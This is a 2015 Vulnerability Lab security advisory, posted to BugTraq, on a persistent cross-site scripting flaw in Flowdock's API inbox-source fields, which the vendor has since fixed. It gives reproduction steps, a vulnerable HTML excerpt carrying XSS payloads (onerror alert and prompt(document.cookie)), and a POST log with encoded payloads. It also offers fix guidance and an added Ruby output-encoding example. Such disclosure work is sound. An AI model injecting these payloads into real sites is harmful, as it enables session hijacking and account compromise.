BugTraq
Flowdock API Bug Bounty #1 - (Description) Persistent Web Vulnerability Sep 23 2015 01:55PM
Vulnerability Lab (research vulnerability-lab com)
Document Title:
===============
Flowdock API Bug Bounty #1 - (Description) Persistent Web Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1560

Release Date:
=============
2015-09-22

Vulnerability Laboratory ID (VL-ID):
====================================
1560

Common Vulnerability Scoring System:
====================================
3.8

Product & Service Introduction:
===============================
Chat & inbox for teams. One place to talk and stay up-to-date. Flowdock is a team collaboration app for desktop, mobile & web.
Work on things that matter, be transparent and solve problems across tools, teams & time zones. Try it for free for 30 days. Keeping Flowdock's
environment and customer data safe and secure is a top priority for us. Find more details on our Help pages. Don't hesitate to contact us
at support (at) flowdock (dot) com [email concealed] should you have any questions about Flowdock's security.

(Copy of the Vendor Homepage: https://www.flowdock.com/security )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered an application-side input validation web vulnerability in the official Flowdock online service web-application.

Vulnerability Disclosure Timeline:
==================================
2015-08-06: Researcher Notification & Coordination (Hadji Samir)
2015-08-07: Vendor Notification (Flowdock Security Team - Bug Bounty Program)
2015-08-08: Vendor Response/Feedback (Flowdock Security Team - Bug Bounty Program)
2015-08-10: Vendor Fix/Patch (Flowdock Developer Team)
2015-09-22: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Rally Software
Product: Flowdock - Online Service (Web-Application) [API] 2015 Q3

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
An application-side input validation web vulnerability has been discovered in the official Flowdock online-service web-application.
The vulnerability allows remote attackers to inject their own malicious script code into the application-side of the vulnerable context function or service module.

The vulnerability is located in the name input field of the inbox sources Flowdock API service. Remote attackers with low privilege application user accounts
are able to inject their own malicious script code into the application-side of the service. The request method used to inject the malicious context is POST and the attack
vector is located on the application-side of the Flowdock API web-service. Remote attackers are able to inject malicious script code on the application-side
to compromise Flowdock accounts by session manipulation or session evasion attacks.

The security risk of the persistent input validation web vulnerability is estimated as medium with a CVSS (Common Vulnerability Scoring System) count of 3.8.
Exploitation of the persistent input validation web vulnerability requires a low privilege web-application user account and low or medium user interaction.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent redirects to external sources
and persistent manipulation of affected or connected service module context.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Inbox Source - Flowdock API

Vulnerable Parameter(s):
[+] description

Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by remote attackers with a low privilege application user account and low or medium user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Create an account whose name contains the payload code
2. Click to add more sources..
3. Click add new (Git)
4. A new link will open, https://www.flowdock.com/jari/auth/git?flow=e60291f4-8869-4f08-b04d-bc07ea6eb787&intent=setup ; write anything in the name field and save
5. Now the payload code will execute
6. Successful reproduce of the application-side vulnerability!

PoC: Vulnerable Source
<li class="row source-group active external_application open"><h5 class="group-title">
<a class="expand-link">
<i class="fa fa-caret-right arrow closed-only"></i>
<i class="fa fa-caret-down arrow open-only"></i>
"><img src="x" onerror=alert(1)>
<span class="count light">(following 1 source)</span>
</a>
</h5>
<ul class="source-list"><li class="source"><ul class="clean actions">
<li>
</li>
<li>
<a class="delete" title="Remove this source.">
<i class="fa fa-fw fa-times"></i>
</a>
</li>
</ul>
<h5 class="source-title" title=""></h5>
<span class="name">
javascript:alert(1)
<span class="description">
(Added by "><img src="./ img src= c onerror=prompt(document.cookie) iframe src= c ( img src= c onerror=alert(1) ) - Flowdock_files/c" onerror="prompt(document.cookie)"><iframe src="./ img src= c onerror=prompt(document.cookie) iframe src= c ( img src= c onerror=alert(1) ) - Flowdock_files/c"> on Aug 07)
</span>
</span>
</iframe></span></span></li></ul>
</li>

--- PoC Session Logs [POST] ---
13:21:13.734[746ms][total 2805ms]
Status: 200[OK]
POST https://www.flowdock.com/jari/git/pairings
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[1235] Mime Type[text/html]
Request Headers:
Host[www.flowdock.com]
User-Agent[Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
Referer[https://www.flowdock.com/jari/auth/git?flow=08bbf4d6-90bb-4e5d-9639-a8cdd218f44b&intent=setup]
Connection[keep-alive]
Post Data:
authenticity_token[VcC1q7HxUipoZa37aKDAcxx65KfvByfRDrtyDm5r3ApWKepzR373VB7C0DQ%2BBHlAegzufv52ocZ3%2Bg4UXKwYyg%3D%3D]
flow[08bbf4d6-90bb-4e5d-9639-a8cdd218f44b]
flow_name[%3Cimg+src%3Dc+onerror%3Dalert%281%29%3E]
flow_token[e085423a527c1f09bcd2f3c26a9b15a5]
source%5Bname%5D[%22%3E%3Ciframe+src%3D%22x%22+onload%3Dalert%28%27xss_by_samir_vuln-lab%27%29%3E]
Response Headers:
Date[Fri, 07 Aug 2015 12:24:35 GMT]
Status[200 OK]
X-Frame-Options[SAMEORIGIN]
X-XSS-Protection[1; mode=block]
X-Content-Type-Options[nosniff]
Content-Security-Policy[default-src *;script-src 'self';style-src 'self' 'unsafe-inline' 'unsafe-eval';object-src 'self';frame-src 'self' flowdock:;child-src 'self' flowdock:;referrer origin]
Content-Type[text/html; charset=utf-8]
Etag[W/"7562a87d6172a931cb31346f8bf6258b"]
Cache-Control[max-age=0, private, must-revalidate]
X-Request-Id[d52e57ab-6c07-45c5-a548-cf98c7c7ee0d]
X-Runtime[0.160761]
Set-Cookie[_jari_session=d1RLU3JHbFZwQWpUOGFab3pYbFZqNDkyYk9SdXRmS0kweU5...%3D--7693378af4e0387d949146f52269990db013bf21; path=/; HttpOnly]
X-Server-Id[475b6e71889f174f61273dab9d11d64422779f4c]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Content-Length[1235]

Reference(s):
https://www.flowdock.com/
https://www.flowdock.com/jari/
https://www.flowdock.com/jari/git/
https://www.flowdock.com/jari/git/pairings

Solution - Fix & Patch:
=======================
The vulnerability can be patched by securely parsing and encoding the vulnerable input field in the source HTML file.
Restrict the input and disallow special chars, escape the output and include an own exception handling to prevent further execution of script code in the same service section.
Prevent the vulnerable part of the code from executing in the output section to finally patch the bug.
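
As an added illustration (not Flowdock's code and not part of the original advisory), the Ruby snippet below contrasts the unsafe rendering the advisory describes with the encoded rendering recommended above. The payload strings are the decoded values from the PoC post data; the render functions, TEMPLATE_TAGS and foreign_tags are hypothetical helpers written for this example.

```ruby
require 'erb'

# Sample values, constructed from the advisory's PoC post data: the decoded
# attacker-controlled source name and flow name.
UNSAFE_SOURCE_NAME = %q{"><iframe src="x" onload=alert('xss_by_samir_vuln-lab')>}
UNSAFE_FLOW_NAME   = %q{<img src=c onerror=alert(1)>}

# Before: user input is interpolated straight into the source-list markup.
# Illustrative reconstruction of the behaviour the advisory describes,
# not Flowdock's actual template.
def render_source_vulnerable(name, added_by)
  %{<span class="name" title="#{name}">#{name}} +
    %{<span class="description">(Added by #{added_by})</span></span>}
end

# After: every user-controlled value is HTML-entity encoded before it is
# placed in element content or a quoted attribute value. ERB::Util.html_escape
# turns & < > " ' into entities, so neither a new tag nor a closing quote can
# originate from the input.
def render_source_safe(name, added_by)
  n = ERB::Util.html_escape(name)
  a = ERB::Util.html_escape(added_by)
  %{<span class="name" title="#{n}">#{n}} +
    %{<span class="description">(Added by #{a})</span></span>}
end

# Hypothetical regression check for a template test suite: element names
# present in the rendered HTML that the template itself never emits.
TEMPLATE_TAGS = %w[span /span].freeze
def foreign_tags(html)
  html.scan(%r{<(/?[a-zA-Z][a-zA-Z0-9]*)}).flatten.uniq.reject { |t| TEMPLATE_TAGS.include?(t) }
end

if __FILE__ == $PROGRAM_NAME
  puts "vulnerable: #{foreign_tags(render_source_vulnerable(UNSAFE_SOURCE_NAME, UNSAFE_FLOW_NAME)).inspect}"
  puts "hardened:   #{foreign_tags(render_source_safe(UNSAFE_SOURCE_NAME, UNSAFE_FLOW_NAME)).inspect}"
end
```

The response in the session log also carries a Content-Security-Policy with script-src 'self' and no 'unsafe-inline'; browsers that enforce that header refuse inline handlers such as onerror and onload, which is useful defense in depth but does not replace encoding at the output point.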

Security Risk:
==============
The security risk of the application-side vulnerability in the flowdock online service web-application is estimated as medium. (CVSS 3.8)

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Hadji Samir [samir (at) evolution-sec (dot) com [email concealed]]

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin (at) vulnerability-lab (dot) com [email concealed] - research (at) vulnerability-lab (dot) com [email concealed] - admin (at) evolution-sec (dot) com [email concealed]
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin (at) vulnerability-lab (dot) com [email concealed] or research (at) vulnerability-lab (dot) com [email concealed]) to get a permission.

Copyright © 2015 | Vulnerability Laboratory [Evolution Security]

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research (at) vulnerability-lab (dot) com [email concealed]
PGP KEY: http://www.vulnerability-lab.com/keys/admin (at) vulnerability-lab (dot) com [email concealed]%280x198E9928%29.txt
